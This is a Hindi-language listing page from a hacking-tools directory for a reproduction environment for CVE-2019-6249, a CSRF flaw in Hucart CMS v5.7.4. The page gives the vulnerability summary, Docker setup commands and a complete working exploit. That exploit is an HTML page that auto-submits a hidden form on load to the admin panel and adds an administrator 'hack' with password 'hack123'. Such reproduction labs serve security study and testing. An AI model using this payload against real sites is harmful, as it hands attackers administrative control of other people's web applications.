Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms पुनरुत्पादन वातावरण | Kitploit
उपकरण/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms पुनरुत्पादन वातावरण

रिपॉजिटरी देखें
124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-6249_Hucart cms

一、भेद्यता सारांश

भेद्यता का नाम: Hucart cms v5.7.4 CSRF भेद्यता जो किसी भी प्रशासक खाते को जोड़ सकती है
रिपोर्ट दिनांक: 2019-01-13
भेद्यता खोजकर्ता: AllenChen ([email protected])
उत्पाद होमपेज: http://www.hucart.com/
सॉफ्टवेयर लिंक: http://www.hucart.com/
संस्करण: v5.7.4
CVE क्रमांक: CVE-2019-6249\

二、भेद्यता अवलोकन

Hucart cms v5.7.4 संस्करण में एक CSRF भेद्यता मौजूद है। जब प्रशासक लॉग इन करता है और नीचे दिए गए CSRF परीक्षण पृष्ठ तक पहुँचता है, तो 'hack' नामक एक प्रशासक खाता जोड़ा जा सकता है।

三、शोषण कोड

EXP कोड इस प्रकार है: 'hack' उपयोगकर्ता नाम और 'hack123' पासवर्ड वाला एक प्रशासक खाता जोड़ें।

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

四、संदर्भ सूचना

  • CVE चीनी आवेदन वेबसाइट: http://www.iwantacve.cn/index.php/archives/109/
  • CVE आधिकारिक: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

五、पर्यावरण पुनरुत्पादन (Docker)

Docker वातावरण में, निम्नलिखित कमांड चलाएँ

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

मूल ईमेल: [email protected]

टूल डाउनलोड करें